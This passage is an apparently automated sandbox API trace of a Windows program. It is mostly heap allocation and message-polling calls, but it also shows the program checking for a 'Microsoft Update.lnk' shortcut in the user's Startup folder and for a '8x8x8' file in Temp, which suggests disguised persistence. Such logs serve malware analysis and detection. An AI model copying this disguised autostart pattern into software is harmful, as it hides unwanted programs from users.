returned 0x2aab9f8 [0229.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0229.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0229.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0229.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0229.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0229.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0229.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0229.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0229.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0229.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0229.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0229.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0229.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0229.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0229.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0229.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0229.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0229.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0229.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0229.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0229.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0229.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0229.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0229.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0229.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0229.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0229.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0229.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0229.272] FreeLibrary (hLibModule=0x76240000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0229.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0229.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0229.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0229.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0229.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0229.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0229.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0229.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0229.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0229.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0229.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0229.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0229.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0229.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0229.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0229.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865d30 [0229.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0229.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0229.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865490 | out: hHeap=0x2af0000) returned 1 [0229.273] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0229.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0229.273] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0229.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0229.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0229.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0229.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0229.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865d30 | out: hHeap=0x2af0000) returned 1 [0229.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0229.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0229.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0229.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0229.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0229.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0229.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0229.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0229.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0229.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0229.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0229.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0229.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0229.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0229.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0229.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0229.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0229.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0229.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0229.275] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0229.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0229.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0229.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0229.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0229.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0229.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0229.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0229.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0229.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0229.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0229.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0229.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0229.276] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0229.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0229.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0229.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab650 [0229.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0229.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0229.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0229.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0229.276] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0229.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0229.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0229.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0229.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0229.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0229.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0229.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0229.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0229.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0229.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0229.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0229.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0229.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0229.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0229.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0229.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0229.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0229.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0229.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0229.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0229.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0229.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0229.277] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0229.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0229.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0229.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0229.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0229.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0229.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0229.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0229.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0229.277] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0229.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0229.277] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0229.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0229.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0229.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0229.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0229.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0229.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0229.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0229.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0229.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0229.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0229.278] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0229.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0229.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0229.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0229.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0229.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0229.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0229.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0229.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0229.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0229.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0229.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0229.278] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0229.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0229.279] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0229.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0229.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0229.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0229.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0229.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0229.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0229.279] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0229.279] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0229.279] timeGetTime () returned 0x11794fb [0229.279] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.279] Sleep (dwMilliseconds=0xa) [0229.322] timeGetTime () returned 0x117952a [0229.322] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.322] Sleep (dwMilliseconds=0xa) [0229.364] timeGetTime () returned 0x1179558 [0229.364] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.364] Sleep (dwMilliseconds=0xa) [0229.410] timeGetTime () returned 0x1179587 [0229.410] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.410] Sleep (dwMilliseconds=0xa) [0229.473] timeGetTime () returned 0x11795c6 [0229.473] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.473] Sleep (dwMilliseconds=0xa) [0229.517] timeGetTime () returned 0x11795e5 [0229.517] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.517] Sleep (dwMilliseconds=0xa) [0229.552] timeGetTime () returned 0x1179614 [0229.552] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.552] Sleep (dwMilliseconds=0xa) [0229.568] timeGetTime () returned 0x1179624 [0229.568] PeekMessageW (in: lpMsg=0x8cf798, 